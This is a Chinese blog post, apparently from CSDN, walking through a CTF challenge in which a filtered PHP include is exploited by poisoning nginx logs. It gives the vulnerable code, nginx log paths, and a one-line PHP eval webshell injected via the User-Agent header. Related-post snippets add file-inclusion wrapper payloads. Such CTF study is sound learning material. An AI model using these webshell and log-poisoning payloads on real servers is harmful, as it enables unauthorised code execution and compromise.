文件包含新姿势~

已于 2022-10-27 18:22:14 修改
阅读量1.7k 收藏 3
点赞数
分类专栏: CTF Web安全 文章标签: 安全 php
于 2022-10-07 09:55:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52118430/article/details/127189540
版权

源代码如下:

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|flag|data|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=/i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

代码比较简短,看到后面的include语句就知道考察的点是文件包含了,然后就是过滤语句,preg_match()以正则表达式的形式比配传递的内容,这里过滤的算是非常严了,过滤关键字php和data直接放弃使用filter和data伪协议,甚至许多符号同样被过滤,传统的思路肯定是行不通的。

没啥思路,这里百度了一波,竟真找到一种比较神奇的姿势:

在这里插入图片描述
通过修改user-agent文件头为恶意代码,nginx在解析时会将网站的请求日志写入对应的log文件中(其实apache也类似)。这也算是nginx中间件的一个特色了,自身存储的日志中包含有UA信息,并且发现网站恰好为nginx,且版本还比较低。
在这里插入图片描述

抓包修改UA:写入phpinfo()

在这里插入图片描述
之后在浏览器中访问nginx的默认日志文件地址:

/var/log/nginx/access.log
/var/log/nginx/error.log

在这里插入图片描述

在phpinfo()中未看见flag,看来要上传一句话马了,步骤同上:
User-Agent: <?php @eval($_POST['shell']); ?>
蚁剑连接:

在这里插入图片描述

最后flag在根目录下查看。

总结:其实这里的利用成功的前提条件挺多的,

  1. 需要知道nginx默认文件的位置(保证默认日志文件位置未更改)
  2. 日志文件可以执行php脚本文件
  3. nginx日志文件可以被访问,例如这里我测试的 /var/log/nginx/error.log 是没办法访问的

应在先考虑使用伪协议读取文件和执行命令的前提下再使用写入日志文件的方法,然而伪协议这个点同样也具有很多的绕过思路,例如双url编码,base64编码绕过…

买Lemon也用劵
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
自己遇到的文件包含各种姿势总结
qq_45655564的博客
07-08 175
伪协议 php://input php://filter data:// 或者利用data协议的base64编码 phar:// index.php?file=phar://test.zip/phpinfo.txt zip:// 但使用zip协议,需要指定绝对路径,同时将#编码为%23,之后填上压缩包内的文件。 index.php?file=zip://D:\phpStudy\WWW\fileinclude\test.zip%23phpinfo.txt 日志包含 User-Agent:<?php ev
面部表情+头部姿势数据集GENKI-R2009a.zip
04-20
-GENKI-4K: 4000张图片,包含表情和头部姿势标签。 -GENKI-SZSL: 3500张图片,包含面部位置和尺寸标签。 每个图像文件都有一个唯一的名称。每个子集包含一个“Images”文本文件 和一个“标签”文本文件。Images文件...
姿势分类模型:可交付成果和文件
02-26
图像分类模型以改善姿势分类 此存储库包含数据可视化和模型实现的文档,用于预测图像中对象的姿势。 我们还使用了可处理视频的代码,以将视频加载到模型中进行姿势预测。 我们进行了一些探索性的数据分析,并在链接的visualisations_doc.ipynb文件中创建了一些可视化文件。 我们的目标是查看标记为遮挡的图像的分布是否显着,以及相对于图像的primary_posture标签,图像的图案尺寸是否明显。 我们还可视化了图像的高宽比。 如我们所见,标有“站立”的图像通常具有比标有“坐着”或“躺着”的图像更高的高宽比,而“躺着”的图像具有最低的总体高宽比。 此外,我们还注意到,在所有3个姿势标签上,箱形图的上限都存在许多正异常值。 当按遮挡进行分组时,一方面,我们仍然可以看到“站立”图像通常具有最高的宽高比。 另一方面,对于“坐着”和“站立”图像,那些未被遮挡的图像通常具有比被遮挡的和未知
ctfhub-phpinfo
2202_75317918的博客
03-16 179
ctfhub phpinfo
[HNCTF 2022 WEEK2]easy_include 日志包含漏洞
最新发布
qq_75120258的博客
03-21 887
​ 日志包含漏洞属于是本地文件包含,同样服务器没有很好的过滤,或者是服务器配置不当导致用户进入了内网,本来常规用户是访问不了这些文件的,但由于发起访问请求的人是服务器本身,也就导致用户任意文件读取。例如:某php文件存在本地文件包含漏洞,但无法上传文件,利用包含漏洞包含Apache(看服务器是Apache还是nginx)日志文件也可以获取WebShell。 ​
无字母命令执行
WHQ556677的博客
12-30 1144
先看一道题 <?php error_reporting(0); show_source(__FILE__); if (isset($_GET['a'])) { $c=$_GET['a']; if (!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)) { system($c); }else { echo "hacker!"; } } ?> 代码审计 过滤了字母
那些年踏过的CTF坑--phpinfo~(二)
u011215939的博客
01-19 4755
曾经学过文件包含,但是没有运用过,今天刚刚好遇到CTF内容为文件包含,可以实践一下来,访问IP:http://106.75.86.18:8888 初步查看URL:http://106.75.86.18:8888/index.php?path=phpinfo.php,path这是文件包含的所特有的,既然给我phpinfo那么就先看看给我们的信息: ubuntu的系统,文件
命令执行的题目加理解
zbbjya的博客
03-21 701
听课笔记ctfshow的理解29 上图中我们会看到有一个preg_match 的函数进行正则表达式的匹配,成功返回1,否则返回0 要有分号不然出不来 phpinfo();使用时后要加分号 分号可以用?>代替 主要作用用法可以看这 https://blog.csdn.net/lituxiu/article/details/89330431?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164783517216781683952973%
文件包含的利用姿势
weixin_30335575的博客
04-12 152
http://thief.one/2017/04/10/2/ 转载于:https://www.cnblogs.com/esthermalley/p/6699131.html
PHP漏洞全解————10、PHP文件包含漏洞
Fly_鹏程万里
07-05 8074
基本相关函数&lt;&gt;php中引发文件包含漏洞的通常是以下四个函数:include()include_once()require()require_once()reuqire() 如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。...
渗透测试之文件包含漏洞&利用姿势
qq_46217803的博客
07-14 1101
文件包含漏洞的分类 大体可以分为:本地文件包含和远程文件包含。顾名思义,引用本地文件,利用inchude包含函数包含本地(服务器)文件。什么是动态变量? 利用协议读取源代码 截断%00 这里假设漏洞代码为 长度截断 漏洞代码演示 与上面原理差不多,在1.txt中写下实例: php:// 实例 如果具有一定的写入权限,POST 写入一句话木马 ...
CTFHub | PHPINFO
尼泊罗河伯的博客
10-03 1707
因为这题没有过多的提示,只是说明了 phpinfo ,点击查看页面发现 phpinfo 测试页面。原以为这题是一道大题,需要利用信息泄露找到跳转页面什么的。测试了好久都是 not found ,最后在接近网页末尾才发现一个名称为 ctfhub ,这才发现了此题 flag 居然隐藏在测试页面中。
基于智能手机的人类活动和姿势转换数据集
06-01
数据集包括以下文件: ‘README.txt’ ‘features_info.txt’: 显示有关在特征向量上使用的变量的信息 ‘features.txt’: 所有特征的列表 ‘activity_labels.txt’: 将类标签与其活动名称链接 ‘train/X_train....
姿势动画师
02-23
姿势动画师 Pose Animator拍摄2D矢量图,并基于PoseNet和... 在输入的SVG文件中以及字符插图中指定了此骨骼结构的初始姿势,同时通过ML模型的识别结果来更实时骨骼位置。 // TODO:添加博客文章链接。 有关其技
铰接式人形身体:该文件包含并显示南希在解剖静态姿势下的铰接式人形身体。-matlab开发
06-01
文件包含并显示了南希在解剖静态姿势下的铰接式人形身体。 身体部分可以独立访问,它们以后缀命名:“_point”,多边形也可以独立使用后缀:“_polygons”。 此外,变量“点”和“多边形”分别包括整个点和...
Bugku之CTFweb8-文件包含
weixin_42478365的博客
05-07 432
<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 观察源码,该代码使用了eval函数,eval函数是将字符串中的数据当成php语言执行,而system函数 — 执行外部程序,并且显示输出,即执行 command 参数所指定的命令, 并且输出执行结果。故构造payload为 http://114.67.246.
文件包含提升
csjjjd的博客
12-17 916
二话不说,先给大家献上干货,以下是CTF伪协议的常见用法,遇到直接自行复制使用即可1.?2.?3.?4.?此协议需要在双on的情况下才能使用,很常用的数据流构造器,将读取后面base编码字符串后解码的数据作为数据流的输入使用方法:data://text/plain;base64,base64编码字符 如data://text/plain,字符 如,
hnctf-pwn-week2
m0_64174759的博客
11-26 879
逆向,整数溢出,orw,栈迁移,ret2csu,partial overwrite
HNCTF---crypto mathRSA
3tefanie丶zhou的博客
10-13 941
【真正有嚼头的男女情爱,就是哑巴吃黄连,旁人拦不住,不吃还不行。】
3dmax bip芭蕾舞文件
09-28
而BIP文件是一种包含了动画数据的文件,特别适用于人物角色的动作表现。 在3ds Max中,我们可以导入BIP文件并应用于人物角色,比如芭蕾舞者。首先,我们需要在3ds Max中创建一个角色模型,可以通过建模、导入或者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值